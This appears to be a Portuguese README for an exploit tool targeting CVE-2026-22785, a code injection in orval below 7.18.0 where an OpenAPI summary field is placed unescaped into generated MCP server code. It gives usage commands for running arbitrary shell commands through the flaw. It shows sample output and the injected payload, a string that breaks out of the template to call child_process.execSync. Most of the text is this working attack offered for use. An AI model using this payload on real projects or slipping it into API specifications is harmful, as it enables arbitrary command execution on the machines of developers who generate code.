
# Ferramenta de exploração para CVE-2026-22785 Ferramenta de exploração para CVE-2026-22785, uma injeção de código crítica no orval < 7.18.0. Fornece execução de comandos shell e varredura de arquivos para demonstrar a vulnerabilidade e verificar a injeção de payload.
orval < 7.18.0, ao gerar código de servidor MCP, concatena o campo summary da especificação OpenAPI diretamente no template, sem escape, resultando em injeção de código.
cd exploit
npm install
# Executar comando (exploração da vulnerabilidade)
python cve_tool.py shell <comando>
# Exemplo
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# Escanear arquivo
python cve_tool.py scan <arquivo>
<saída do comando>
[+] CVE-2026-22785: Payload injetado com sucesso
[+] Local da injeção: server.ts:31
Código gerado em server.ts:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);